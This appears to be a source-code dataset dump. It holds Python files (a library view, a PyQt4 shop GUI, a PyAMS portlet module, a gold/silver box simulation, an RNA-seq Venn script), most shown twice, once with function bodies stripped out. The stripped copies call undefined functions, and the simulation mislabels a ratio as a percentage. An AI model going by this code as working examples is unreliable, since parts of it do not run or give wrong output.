lbs = sorted(lbs, key=lambda (l,b): (haversine(user_location, l.entity.location)
if l.entity and l.entity.location else float('inf')))
for library, books in lbs:
if library.entity != None and library.entity.location != None:
colour = AVAIL_COLORS[max(b['availability'] for b in books)]
points.append((library.entity.location[0],
library.entity.location[1],
colour,
library.entity.title))
point_libraries.append(library)
if len(points) > 0:
context['map'] = Map(
centre_point = (user_location[0], user_location[1], 'green', '')
if user_location != None else None,
points = points,
min_points = 0 if context['zoom'] else len(points),
zoom = context['zoom'],
width = request.map_width,
height = request.map_height,
)
# Yes, this is weird. fit_to_map() groups libraries with the same
# location so here we add a marker_number to each library to display
# in the template.
lib_iter = iter(point_libraries)
for i, (a,b) in enumerate(context['map'].points):
for j in range(len(b)):
lib_iter.next().marker_number = i + 1
context.update({
'sorted_libraries': lbs,
})
return self.render(request, context, 'library/item_detail')
class ItemHoldingsView(ZoomableView):
"""
Specific details of holdings of a particular item
"""
def initial_context(self, request, control_number, sublocation):
context = super(ItemHoldingsView, self).initial_context(request)
# Get item from database
item = self.conf.provider.control_number_search(control_number)
if item is None:
raise Http404
# Find which particular library we're interested in
library = None
for item_library in item.libraries:
if item_library.location == tuple(sublocation.split('/')):
library = item_library
if library is None:
raise Http404
context.update({
'item': item,
'library': library,
'control_number': control_number,
'books': item.libraries[library],
})
return context
def get_metadata(self, request, control_number, sublocation):
return {
'show_in_results': False,
}
@BreadcrumbFactory
def breadcrumb(self, request, context, control_number, sublocation):
return Breadcrumb(
self.conf.local_name,
lazy_parent('item-detail', control_number=control_number),
_('Item holdings information'),
lazy_reverse('item-holdings-detail', args=[control_number,sublocation]),
)
def handle_GET(self, request, context, control_number, sublocation):
return self.render(request, context, 'library/item_holdings_detail')
| 7,052 | 0 | 464 |
7c4ea99478a8b815bbc72c96a682399b86c5de9d | 3,902 | py | Python | unit_08/main7.py | janusnic/21v-pyqt | 8ee3828e1c6e6259367d6cedbd63b9057cf52c24 | [
"MIT"
] | null | null | null | unit_08/main7.py | janusnic/21v-pyqt | 8ee3828e1c6e6259367d6cedbd63b9057cf52c24 | [
"MIT"
] | null | null | null | unit_08/main7.py | janusnic/21v-pyqt | 8ee3828e1c6e6259367d6cedbd63b9057cf52c24 | [
"MIT"
] | 2 | 2019-11-14T15:04:22.000Z | 2021-10-31T07:34:46.000Z | # -*- coding:utf-8 -*-
import os
import sys
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from sqldb import *
from add_customer import *
from customer_order import *
main()
| 38.254902 | 103 | 0.705279 | # -*- coding:utf-8 -*-
import os
import sys
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from sqldb import *
from add_customer import *
from customer_order import *
class ShopWindow(QMainWindow):
def __init__(self, parent=None):
super(ShopWindow, self).__init__(parent)
self.setMinimumWidth(850)
self.setWindowTitle(u'Магазин Все Продается')
#create actions - these can be used in menus/toolbars etc.
self.open_database = QAction("Open Database",self)
self.close_database = QAction("Close Database",self)
self.add_customer = QAction("Add Customer",self)
self.browse_customers = QAction("Browse Customers",self)
self.add_order = QAction("Add Order",self)
self.browse_orders = QAction("Browse Orders",self)
self.add_product = QAction("Add Product",self)
self.browse_products = QAction("Browse Products",self)
# создаем menubar
self.menu_bar = self.menuBar()
self.database_menu = self.menu_bar.addMenu("Database")
self.customer_menu = self.menu_bar.addMenu("Customer")
self.order_menu = self.menu_bar.addMenu("Order")
self.product_menu = self.menu_bar.addMenu("Product")
#add the actions to the menubar
self.database_menu.addAction(self.open_database)
self.database_menu.addAction(self.close_database)
self.customer_menu.addAction(self.add_customer)
self.customer_menu.addAction(self.browse_customers)
self.order_menu.addAction(self.add_order)
self.order_menu.addAction(self.browse_orders)
self.product_menu.addAction(self.add_product)
self.product_menu.addAction(self.browse_products)
# создаем toolbars
self.database_toolbar = QToolBar("Manage Databases")
self.customer_toolbar = QToolBar("Manage Customers")
self.order_toolbar = QToolBar("Manage Orders")
self.product_toolbar = QToolBar("Manage Products")
# добавим toolbars к window
self.addToolBar(self.database_toolbar)
self.addToolBar(self.customer_toolbar)
self.addToolBar(self.order_toolbar)
self.addToolBar(self.product_toolbar)
#add actions to toolbars
self.database_toolbar.addAction(self.open_database)
self.database_toolbar.addAction(self.close_database)
self.customer_toolbar.addAction(self.add_customer)
self.customer_toolbar.addAction(self.browse_customers)
self.order_toolbar.addAction(self.add_order)
self.order_toolbar.addAction(self.browse_orders)
self.product_toolbar.addAction(self.add_product)
self.product_toolbar.addAction(self.browse_products)
#connections
self.open_database.triggered.connect(self.openDatabase)
self.add_customer.triggered.connect(self.addCustomer)
self.add_order.triggered.connect(self.addOrder)
def openDatabase(self):
path = QFileDialog.getOpenFileName(caption="Open Database",filter="Database file (*.db *.dat)")
self.connection = SQLConnection(path)
self.connection.open_database()
def addCustomer(self):
self.add_customer_widget = AddCustomerWidget()
self.setCentralWidget(self.add_customer_widget)
#connect the custom signal in the widget to our method
self.add_customer_widget.customerAddedSignal.connect(self.saveCustomer)
def saveCustomer(self):
details = self.add_customer_widget.customer_details()
self.connection.add_new_customer(details)
self.add_customer_widget.clear_details()
def addOrder(self):
self.add_order_widget = CustomerOrderWidget(self.connection)
self.setCentralWidget(self.add_order_widget)
def main():
app = QApplication(sys.argv)
window = ShopWindow()
window.show()
window.raise_()
sys.exit(app.exec_())
main()
| 3,572 | 9 | 180 |
9aa3bd2b23226f521d7c52a9adbd1c90b631cff8 | 13,955 | py | Python | src/pyams_portal/portlet.py | Py-AMS/pyams-portal | a19f48079e683711394b8e57c05cf7cd9d20a888 | [
"ZPL-2.1"
] | null | null | null | src/pyams_portal/portlet.py | Py-AMS/pyams-portal | a19f48079e683711394b8e57c05cf7cd9d20a888 | [
"ZPL-2.1"
] | null | null | null | src/pyams_portal/portlet.py | Py-AMS/pyams-portal | a19f48079e683711394b8e57c05cf7cd9d20a888 | [
"ZPL-2.1"
] | null | null | null | #
# Copyright (c) 2015-2021 Thierry Florac <tflorac AT ulthar.net>
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
"""PyAMS_portal.portlet module
This module defines all portlet-related components.
"""
__docformat__ = 'restructuredtext'
import logging
import venusian
from persistent import Persistent
from persistent.mapping import PersistentMapping
from pyramid.exceptions import ConfigurationError
from zope.container.contained import Contained
from zope.copy import clone
from zope.interface import alsoProvides, implementer, noLongerProvides
from zope.lifecycleevent import ObjectCreatedEvent
from zope.location import locate
from zope.schema.fieldproperty import FieldProperty
from zope.schema.vocabulary import SimpleTerm, SimpleVocabulary
from zope.traversing.interfaces import ITraversable
from pyams_portal.interfaces import IPortalContext, IPortalPage, IPortalPortletsConfiguration, \
IPortalTemplate, IPortlet, IPortletConfiguration, IPortletRenderer, \
IPortletSettings, MANAGE_TEMPLATE_PERMISSION, PORTLETS_VOCABULARY_NAME
from pyams_security.interfaces import IViewContextPermissionChecker
from pyams_utils.adapter import ContextAdapter, adapter_config
from pyams_utils.factory import factory_config, get_object_factory, is_interface
from pyams_utils.registry import get_pyramid_registry
from pyams_utils.request import check_request
from pyams_utils.vocabulary import vocabulary_config
LOGGER = logging.getLogger('PyAMS (portal)')
@implementer(IPortlet)
class Portlet:
"""Base portlet utility"""
permission = FieldProperty(IPortlet['permission'])
toolbar_image = None
toolbar_css_class = 'fa-edit'
settings_factory = None
class portlet_config: # pylint: disable=invalid-name
"""Class decorator used to declare a portlet"""
venusian = venusian # for testing injection
@vocabulary_config(name=PORTLETS_VOCABULARY_NAME)
class PortletVocabulary(SimpleVocabulary):
"""Portlet vocabulary"""
#
# Portlet configuration
#
@implementer(IPortletSettings)
class PortletSettings(Persistent, Contained):
"""Portlet settings persistent class
This class is supposed to be sub-classed by all custom portlet subclasses to
store their configuration settings.
Each portlet sub-class must define it's settings factory in it's "settings_factory" attribute.
Given factory can be a function, a class or an interface; in this last case, implementation
is looking for default object factory registered for this interface.
"""
_renderer = FieldProperty(IPortletSettings['renderer'])
__name__ = '++settings++'
@property
def visible(self):
"""Visibility getter"""
return self._renderer != 'hidden'
@property
def renderer(self):
"""Renderer name getter"""
return self._renderer
@renderer.setter
def renderer(self, value):
"""Renderer setter"""
value = value or ''
if value == self._renderer:
return
request = check_request()
registry = request.registry
renderer = registry.queryMultiAdapter((request.root, request, request, self),
IPortletRenderer, name=self._renderer)
if (renderer is not None) and (renderer.target_interface is not None):
noLongerProvides(self, renderer.target_interface)
self._renderer = value
renderer = registry.queryMultiAdapter((request.root, request, request, self),
IPortletRenderer, name=self._renderer)
if (renderer is not None) and (renderer.target_interface is not None):
alsoProvides(self, renderer.target_interface)
def get_renderer(self, request=None):
"""Renderer adapter getter"""
if request is None:
request = check_request()
return request.registry.queryMultiAdapter((request.root, request, request, self),
IPortletRenderer, name=self._renderer)
@property
def configuration(self):
"""Configuration getter"""
return self.__parent__
@configuration.setter
def configuration(self, value):
"""Configuration setter"""
if self.__parent__ is None:
self.__parent__ = value
@adapter_config(required=IPortletSettings, provides=IViewContextPermissionChecker)
class PortletSettingsPermissionChecker(ContextAdapter):
"""Portlet settings permission checker"""
edit_permission = MANAGE_TEMPLATE_PERMISSION
@factory_config(IPortletConfiguration)
class PortletConfiguration(Persistent, Contained):
"""Portlet configuration persistent class
This class is a generic persistent class which is used to store all portlet
configuration and is *not* supposed to be sub-classed.
PortletConfiguration.__parent__ points to context where configuration is applied
(each context or local template).
PortletConfiguration.parent points to context from where configuration is inherited.
"""
portlet_id = FieldProperty(IPortletConfiguration['portlet_id'])
portlet_name = None
_inherit_parent = FieldProperty(IPortletConfiguration['inherit_parent'])
_settings = FieldProperty(IPortletConfiguration['settings'])
def get_portlet(self):
"""Portlet utility getter"""
return get_pyramid_registry().queryUtility(IPortlet, name=self.portlet_name)
@property
def can_inherit(self):
"""Check if configuration can be inherited"""
return not IPortalTemplate.providedBy(self.__parent__)
@property
def inherit_parent(self):
"""Check if inheritance is enabled"""
return self._inherit_parent if self.can_inherit else False
@inherit_parent.setter
def inherit_parent(self, value):
"""Inheritance setter"""
if (not value) or self.can_inherit:
self._inherit_parent = value
@property
def override_parent(self):
"""Parent overriding getter"""
return not self.inherit_parent
@override_parent.setter
def override_parent(self, value):
"""Parent overriding setter"""
self.inherit_parent = not value
@property
def parent(self):
"""Parent getter"""
parent = self.__parent__
if IPortalTemplate.providedBy(parent):
return parent
while True:
if IPortalContext.providedBy(parent):
configuration = IPortalPortletsConfiguration(parent).get_portlet_configuration(
self.portlet_id)
if not configuration.inherit_parent:
return parent
page = IPortalPage(parent)
if not page.inherit_parent:
break
parent = parent.__parent__
if parent is None:
break
page = IPortalPage(parent, None)
if page is not None:
return page.template
return None
@property
def settings(self):
"""Current settings getter (using inheritance settings)"""
if self.inherit_parent:
return IPortalPortletsConfiguration(self.parent).get_portlet_configuration(
self.portlet_id).settings
return self._settings
@property
def editor_settings(self):
"""Editor settings getter (always return local settings)"""
return self._settings
def get_settings(self, allow_inherit=True):
"""Settings getter (using inheritance or not according to allow_inherit argument)"""
if allow_inherit:
return self.settings
return self._settings
@adapter_config(required=IPortlet, provides=IPortletConfiguration)
def portlet_configuration_adapter(portlet):
"""Portlet configuration factory"""
return PortletConfiguration(portlet)
@adapter_config(required=IPortletConfiguration, provides=IPortletSettings)
def portlet_configuration_settings_adapter(configuration):
"""Portlet configuration settings adapter"""
return configuration.settings
@adapter_config(required=IPortletSettings, provides=IPortletConfiguration)
def portlet_settings_configuration_adapter(settings):
"""Portlet settings configuration adapter"""
return settings.configuration
@adapter_config(name='settings',
required=IPortletConfiguration, provides=ITraversable)
class PortletConfigurationSettingsTraverser(ContextAdapter):
"""++settings++ portlet configuration traverser"""
def traverse(self, name, furtherpath=None): # pylint: disable=unused-argument
"""Portlet configuration traverser to settings"""
return self.context.settings
@adapter_config(required=IPortletConfiguration, provides=IViewContextPermissionChecker)
class PortletConfigurationPermissionChecker(ContextAdapter):
"""Portlet configuration permission checker"""
edit_permission = MANAGE_TEMPLATE_PERMISSION
#
# Template portlets configuration
#
@factory_config(IPortalPortletsConfiguration)
class PortalPortletsConfiguration(PersistentMapping, Contained):
"""Portal portlets configuration"""
@classmethod
def clone(cls, source_config, new_parent):
"""Clone source configuration"""
configuration = source_config.__class__()
get_pyramid_registry().notify(ObjectCreatedEvent(configuration))
locate(configuration, new_parent)
for config_id, config_portlet in source_config.items():
config = clone(config_portlet)
configuration[config_id] = config
return configuration
def get_portlet_configuration(self, portlet_id):
"""Portlet configuration getter"""
configuration = self.get(portlet_id)
if configuration is None:
if IPortalTemplate.providedBy(self.__parent__):
portlets = IPortalPortletsConfiguration(self.__parent__)
else:
template = IPortalPage(self.__parent__).template
portlets = IPortalPortletsConfiguration(template)
configuration = clone(portlets.get_portlet_configuration(portlet_id))
get_pyramid_registry().notify(ObjectCreatedEvent(configuration))
self.set_portlet_configuration(portlet_id, configuration)
return configuration
def set_portlet_configuration(self, portlet_id, config):
"""Portlet configuration setter"""
config.portlet_id = portlet_id
self[portlet_id] = config
def delete_portlet_configuration(self, portlet_id):
"""Delete portlet configuration"""
if isinstance(portlet_id, int):
portlet_id = (portlet_id,)
for p_id in portlet_id:
del self[p_id]
| 36.341146 | 98 | 0.68771 | #
# Copyright (c) 2015-2021 Thierry Florac <tflorac AT ulthar.net>
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
"""PyAMS_portal.portlet module
This module defines all portlet-related components.
"""
__docformat__ = 'restructuredtext'
import logging
import venusian
from persistent import Persistent
from persistent.mapping import PersistentMapping
from pyramid.exceptions import ConfigurationError
from zope.container.contained import Contained
from zope.copy import clone
from zope.interface import alsoProvides, implementer, noLongerProvides
from zope.lifecycleevent import ObjectCreatedEvent
from zope.location import locate
from zope.schema.fieldproperty import FieldProperty
from zope.schema.vocabulary import SimpleTerm, SimpleVocabulary
from zope.traversing.interfaces import ITraversable
from pyams_portal.interfaces import IPortalContext, IPortalPage, IPortalPortletsConfiguration, \
IPortalTemplate, IPortlet, IPortletConfiguration, IPortletRenderer, \
IPortletSettings, MANAGE_TEMPLATE_PERMISSION, PORTLETS_VOCABULARY_NAME
from pyams_security.interfaces import IViewContextPermissionChecker
from pyams_utils.adapter import ContextAdapter, adapter_config
from pyams_utils.factory import factory_config, get_object_factory, is_interface
from pyams_utils.registry import get_pyramid_registry
from pyams_utils.request import check_request
from pyams_utils.vocabulary import vocabulary_config
LOGGER = logging.getLogger('PyAMS (portal)')
@implementer(IPortlet)
class Portlet:
"""Base portlet utility"""
permission = FieldProperty(IPortlet['permission'])
toolbar_image = None
toolbar_css_class = 'fa-edit'
settings_factory = None
class portlet_config: # pylint: disable=invalid-name
"""Class decorator used to declare a portlet"""
venusian = venusian # for testing injection
def __init__(self, **settings):
self.__dict__.update(settings)
def __call__(self, wrapped):
settings = self.__dict__.copy()
depth = settings.pop('_depth', 0)
def callback(context, name, ob): # pylint: disable=invalid-name,unused-argument
name = settings.get('name') or getattr(ob, 'name', name)
if name is None:
raise ConfigurationError("You must provide a name for a portlet")
permission = settings.get('permission')
if permission is not None:
ob.permission = permission
if type(ob) is type: # pylint: disable=unidiomatic-typecheck
factory = ob
component = None
else:
factory = None
component = ob
LOGGER.debug("Registering portlet {0} named '{1}'".format(
str(component) if component else str(factory), name))
config = context.config.with_package(info.module) # pylint: disable=no-member
registry = settings.get('registry', config.registry)
registry.registerUtility(component=component, factory=factory,
provided=IPortlet, name=name)
info = self.venusian.attach(wrapped, callback, category='pyramid',
depth=depth + 1)
if info.scope == 'class': # pylint: disable=no-member
# if the decorator was attached to a method in a class, or
# otherwise executed at class scope, we need to set an
# 'attr' into the settings if one isn't already in there
if settings.get('attr') is None:
settings['attr'] = wrapped.__name__
settings['_info'] = info.codeinfo # pylint: disable=no-member
return wrapped
@vocabulary_config(name=PORTLETS_VOCABULARY_NAME)
class PortletVocabulary(SimpleVocabulary):
"""Portlet vocabulary"""
def __init__(self, context): # pylint: disable=unused-argument
request = check_request()
translate = request.localizer.translate
utils = request.registry.getUtilitiesFor(IPortlet)
terms = [
SimpleTerm(name, title=translate(util.label))
for name, util in sorted(utils, key=lambda x: translate(x[1].label))
]
super().__init__(terms)
#
# Portlet configuration
#
@implementer(IPortletSettings)
class PortletSettings(Persistent, Contained):
"""Portlet settings persistent class
This class is supposed to be sub-classed by all custom portlet subclasses to
store their configuration settings.
Each portlet sub-class must define it's settings factory in it's "settings_factory" attribute.
Given factory can be a function, a class or an interface; in this last case, implementation
is looking for default object factory registered for this interface.
"""
_renderer = FieldProperty(IPortletSettings['renderer'])
__name__ = '++settings++'
def __init__(self, configuration=None):
self.__parent__ = configuration
@property
def visible(self):
"""Visibility getter"""
return self._renderer != 'hidden'
@property
def renderer(self):
"""Renderer name getter"""
return self._renderer
@renderer.setter
def renderer(self, value):
"""Renderer setter"""
value = value or ''
if value == self._renderer:
return
request = check_request()
registry = request.registry
renderer = registry.queryMultiAdapter((request.root, request, request, self),
IPortletRenderer, name=self._renderer)
if (renderer is not None) and (renderer.target_interface is not None):
noLongerProvides(self, renderer.target_interface)
self._renderer = value
renderer = registry.queryMultiAdapter((request.root, request, request, self),
IPortletRenderer, name=self._renderer)
if (renderer is not None) and (renderer.target_interface is not None):
alsoProvides(self, renderer.target_interface)
def get_renderer(self, request=None):
"""Renderer adapter getter"""
if request is None:
request = check_request()
return request.registry.queryMultiAdapter((request.root, request, request, self),
IPortletRenderer, name=self._renderer)
@property
def configuration(self):
"""Configuration getter"""
return self.__parent__
@configuration.setter
def configuration(self, value):
"""Configuration setter"""
if self.__parent__ is None:
self.__parent__ = value
@adapter_config(required=IPortletSettings, provides=IViewContextPermissionChecker)
class PortletSettingsPermissionChecker(ContextAdapter):
"""Portlet settings permission checker"""
edit_permission = MANAGE_TEMPLATE_PERMISSION
@factory_config(IPortletConfiguration)
class PortletConfiguration(Persistent, Contained):
"""Portlet configuration persistent class
This class is a generic persistent class which is used to store all portlet
configuration and is *not* supposed to be sub-classed.
PortletConfiguration.__parent__ points to context where configuration is applied
(each context or local template).
PortletConfiguration.parent points to context from where configuration is inherited.
"""
portlet_id = FieldProperty(IPortletConfiguration['portlet_id'])
portlet_name = None
_inherit_parent = FieldProperty(IPortletConfiguration['inherit_parent'])
_settings = FieldProperty(IPortletConfiguration['settings'])
def __init__(self, portlet):
self.portlet_name = portlet.name
factory = portlet.settings_factory
if is_interface(factory):
factory = get_object_factory(factory)
assert factory is not None, "Missing portlet settings factory"
settings = factory()
settings.configuration = self
self._settings = settings
def get_portlet(self):
"""Portlet utility getter"""
return get_pyramid_registry().queryUtility(IPortlet, name=self.portlet_name)
@property
def can_inherit(self):
"""Check if configuration can be inherited"""
return not IPortalTemplate.providedBy(self.__parent__)
@property
def inherit_parent(self):
"""Check if inheritance is enabled"""
return self._inherit_parent if self.can_inherit else False
@inherit_parent.setter
def inherit_parent(self, value):
"""Inheritance setter"""
if (not value) or self.can_inherit:
self._inherit_parent = value
@property
def override_parent(self):
"""Parent overriding getter"""
return not self.inherit_parent
@override_parent.setter
def override_parent(self, value):
"""Parent overriding setter"""
self.inherit_parent = not value
@property
def parent(self):
"""Parent getter"""
parent = self.__parent__
if IPortalTemplate.providedBy(parent):
return parent
while True:
if IPortalContext.providedBy(parent):
configuration = IPortalPortletsConfiguration(parent).get_portlet_configuration(
self.portlet_id)
if not configuration.inherit_parent:
return parent
page = IPortalPage(parent)
if not page.inherit_parent:
break
parent = parent.__parent__
if parent is None:
break
page = IPortalPage(parent, None)
if page is not None:
return page.template
return None
@property
def settings(self):
"""Current settings getter (using inheritance settings)"""
if self.inherit_parent:
return IPortalPortletsConfiguration(self.parent).get_portlet_configuration(
self.portlet_id).settings
return self._settings
@property
def editor_settings(self):
"""Editor settings getter (always return local settings)"""
return self._settings
def get_settings(self, allow_inherit=True):
"""Settings getter (using inheritance or not according to allow_inherit argument)"""
if allow_inherit:
return self.settings
return self._settings
@adapter_config(required=IPortlet, provides=IPortletConfiguration)
def portlet_configuration_adapter(portlet):
"""Portlet configuration factory"""
return PortletConfiguration(portlet)
@adapter_config(required=IPortletConfiguration, provides=IPortletSettings)
def portlet_configuration_settings_adapter(configuration):
"""Portlet configuration settings adapter"""
return configuration.settings
@adapter_config(required=IPortletSettings, provides=IPortletConfiguration)
def portlet_settings_configuration_adapter(settings):
"""Portlet settings configuration adapter"""
return settings.configuration
@adapter_config(name='settings',
required=IPortletConfiguration, provides=ITraversable)
class PortletConfigurationSettingsTraverser(ContextAdapter):
"""++settings++ portlet configuration traverser"""
def traverse(self, name, furtherpath=None): # pylint: disable=unused-argument
"""Portlet configuration traverser to settings"""
return self.context.settings
@adapter_config(required=IPortletConfiguration, provides=IViewContextPermissionChecker)
class PortletConfigurationPermissionChecker(ContextAdapter):
"""Portlet configuration permission checker"""
edit_permission = MANAGE_TEMPLATE_PERMISSION
#
# Template portlets configuration
#
@factory_config(IPortalPortletsConfiguration)
class PortalPortletsConfiguration(PersistentMapping, Contained):
"""Portal portlets configuration"""
@classmethod
def clone(cls, source_config, new_parent):
"""Clone source configuration"""
configuration = source_config.__class__()
get_pyramid_registry().notify(ObjectCreatedEvent(configuration))
locate(configuration, new_parent)
for config_id, config_portlet in source_config.items():
config = clone(config_portlet)
configuration[config_id] = config
return configuration
def __setitem__(self, key, value):
super().__setitem__(key, value)
locate(value, self.__parent__, '++portlet++{0}'.format(key))
def get_portlet_configuration(self, portlet_id):
"""Portlet configuration getter"""
configuration = self.get(portlet_id)
if configuration is None:
if IPortalTemplate.providedBy(self.__parent__):
portlets = IPortalPortletsConfiguration(self.__parent__)
else:
template = IPortalPage(self.__parent__).template
portlets = IPortalPortletsConfiguration(template)
configuration = clone(portlets.get_portlet_configuration(portlet_id))
get_pyramid_registry().notify(ObjectCreatedEvent(configuration))
self.set_portlet_configuration(portlet_id, configuration)
return configuration
def set_portlet_configuration(self, portlet_id, config):
"""Portlet configuration setter"""
config.portlet_id = portlet_id
self[portlet_id] = config
def delete_portlet_configuration(self, portlet_id):
"""Delete portlet configuration"""
if isinstance(portlet_id, int):
portlet_id = (portlet_id,)
for p_id in portlet_id:
del self[p_id]
| 2,700 | 0 | 162 |
bc5db1a7313edd0e614dac7de99e16d9af554f32 | 1,252 | py | Python | simulate.py | trevharmon/gold-silver-3box | 8d1428e2400c6abbcfb862f69a3432cf882701de | [
"Apache-2.0"
] | null | null | null | simulate.py | trevharmon/gold-silver-3box | 8d1428e2400c6abbcfb862f69a3432cf882701de | [
"Apache-2.0"
] | null | null | null | simulate.py | trevharmon/gold-silver-3box | 8d1428e2400c6abbcfb862f69a3432cf882701de | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import random
import time
tests = 1000000
boxes = [[ 'G', 'G' ],
[ 'G', 'S' ],
[ 'S', 'S' ]]
draws = [[[ 0, 0 ], [ 0, 0 ], [ 0, 0 ]],
[[ 0, 0 ], [ 0, 0 ], [ 0, 0 ]]]
total_gold_1 = 0
total_gold_2 = 0
print('Running %d tests.'%(tests))
random.seed(int(time.time()))
for i in range(tests):
box = random.randint(0,2)
ball = random.randint(0,1)
draws[0][box][ball] = draws[0][box][ball] + 1
if boxes[box][ball] is 'G':
total_gold_1 = total_gold_1 + 1
ball = (ball + 1) % 2
draws[1][box][ball] = draws[1][box][ball] + 1
if boxes[box][ball] is 'G':
total_gold_2 = total_gold_2 + 1
print('Draws:')
print('- Box 1 [G, G]:')
print(' Gold1 -> Gold2: %d'%(draws[0][0][0]))
print(' Gold2 -> Gold1: %d'%(draws[0][0][1]))
print('- Box 2 [G, S]:')
print(' Gold -> Silver: %d'%(draws[0][1][0]))
print(' Silver: %d'%(draws[0][1][1]))
print('- Box 3 [S, S]:')
print(' Silver1: %d'%(draws[0][2][0]))
print(' Silver2: %d'%(draws[0][2][1]))
print('')
print('Gold on 1st draw: %d'%(total_gold_1))
print('Gold on 2nd draw: %d'%(total_gold_2))
print('Percent two golds: %.2f%%'%(float(total_gold_2) / float(total_gold_1)))
| 29.809524 | 78 | 0.517572 | #!/usr/bin/env python
import random
import time
tests = 1000000
boxes = [[ 'G', 'G' ],
[ 'G', 'S' ],
[ 'S', 'S' ]]
draws = [[[ 0, 0 ], [ 0, 0 ], [ 0, 0 ]],
[[ 0, 0 ], [ 0, 0 ], [ 0, 0 ]]]
total_gold_1 = 0
total_gold_2 = 0
print('Running %d tests.'%(tests))
random.seed(int(time.time()))
for i in range(tests):
box = random.randint(0,2)
ball = random.randint(0,1)
draws[0][box][ball] = draws[0][box][ball] + 1
if boxes[box][ball] is 'G':
total_gold_1 = total_gold_1 + 1
ball = (ball + 1) % 2
draws[1][box][ball] = draws[1][box][ball] + 1
if boxes[box][ball] is 'G':
total_gold_2 = total_gold_2 + 1
print('Draws:')
print('- Box 1 [G, G]:')
print(' Gold1 -> Gold2: %d'%(draws[0][0][0]))
print(' Gold2 -> Gold1: %d'%(draws[0][0][1]))
print('- Box 2 [G, S]:')
print(' Gold -> Silver: %d'%(draws[0][1][0]))
print(' Silver: %d'%(draws[0][1][1]))
print('- Box 3 [S, S]:')
print(' Silver1: %d'%(draws[0][2][0]))
print(' Silver2: %d'%(draws[0][2][1]))
print('')
print('Gold on 1st draw: %d'%(total_gold_1))
print('Gold on 2nd draw: %d'%(total_gold_2))
print('Percent two golds: %.2f%%'%(float(total_gold_2) / float(total_gold_1)))
| 0 | 0 | 0 |
0fb7fb95900ecf367a17b0e5bad2f5a6a92e2e5d | 3,961 | py | Python | workflow/scripts/VennDiagrams.py | sanjaynagi/rna-seq-pop | fedbdd374837876947be5c4d113f05a1577045ca | [
"MIT"
] | 2 | 2021-06-22T13:05:43.000Z | 2022-01-31T08:00:33.000Z | workflow/scripts/VennDiagrams.py | sanjaynagi/rna-seq-pop | fedbdd374837876947be5c4d113f05a1577045ca | [
"MIT"
] | 3 | 2021-06-18T09:22:29.000Z | 2022-03-26T19:52:11.000Z | workflow/scripts/VennDiagrams.py | sanjaynagi/rna-seq-pop | fedbdd374837876947be5c4d113f05a1577045ca | [
"MIT"
] | 1 | 2021-12-16T03:11:02.000Z | 2021-12-16T03:11:02.000Z | #!/usr/bin/env python3
"""
A script to get the intersections of Differential expression results, Fst, and differential SNPs analysis.
Draws Venn diagrams and adds columns to RNA-seq-diff.xlsx, whether the gene has high Fst/PBS/diffsnps.
"""
import sys
sys.stderr = open(snakemake.log[0], "w")
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from matplotlib_venn import *
import pandas as pd
import numpy as np
from pathlib import Path
#### Main ####
# Read contrasts in and other snakemake params
comparisons = pd.DataFrame(snakemake.params['DEcontrasts'], columns=['contrast'])
comparisons = comparisons.contrast.str.split("_", expand=True)
comparisons = [list(row) for i,row in comparisons.iterrows()]
percentile = snakemake.params['percentile']
diffsnps = snakemake.params['diffsnps']
# Create a Pandas Excel writer using XlsxWriter as the engine.
writer = pd.ExcelWriter('results/RNA-Seq-full.xlsx', engine='xlsxwriter')
#### Differential expression v Fst venn diagram
for comp1,comp2 in comparisons:
name = comp1 + "_" + comp2
print(f"\n-------------- Venn Diagram for {name} --------------")
de = pd.read_csv(f"results/genediff/{name}.csv")
fst = pd.read_csv("results/variantAnalysis/selection/FstPerGene.tsv", sep="\t")
#compare sig DE genes and top 5% fst genes?
#get sig up and down diffexp genes
sigde = de[de['padj'] < pval_threshold]
sigde_up = sigde[sigde['FC'] > upper_fc]
sigde_down = sigde[sigde['FC'] < lower_fc]
#take top percentile of fst genes
highfst = fst.nlargest(int(fst.shape[0]*percentile),f"{name}_zFst")
#how many fst? how many sig de up and down?
nfst = highfst.shape[0]
nde_up = sigde_up.shape[0]
nde_down = sigde_down.shape[0]
print(f"There are {nde_up} significantly upregulated genes in {name}")
print(f"There are {nde_down} significantly downregulated genes in {name}")
nboth, _ = intersect2(sigde_up,
highfst,
de,
write=True,
path=f"results/venn/{name}.DE.Fst.intersection.tsv")
###### XLSX file ######
if diffsnps:
diffsnpsDE = pd.read_csv("results/diffsnps/{name}.sig.kissDE.tsv", sep="\t")
sheet = add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsDE)
else:
sheet = add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsDE=None)
# Write each dataframe to a different worksheet.
sheet.to_excel(writer, sheet_name=name)
# Close the Pandas Excel writer and output the Excel file.
writer.save() | 35.053097 | 118 | 0.666246 | #!/usr/bin/env python3
"""
A script to get the intersections of Differential expression results, Fst, and differential SNPs analysis.
Draws Venn diagrams and adds columns to RNA-seq-diff.xlsx, whether the gene has high Fst/PBS/diffsnps.
"""
import sys
sys.stderr = open(snakemake.log[0], "w")
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from matplotlib_venn import *
import pandas as pd
import numpy as np
from pathlib import Path
def plotvenn2(name, group1, group2, nboth,stat="DE_PBS", group1name='Significant up DE genes', group2name='High PBS'):
print(f"There are {group2} high Fst genes in {name}")
print(f"There are {nboth} shared in {name}")
venn2(subsets = (group1, group2, nboth), set_labels = (group1name, group2name),
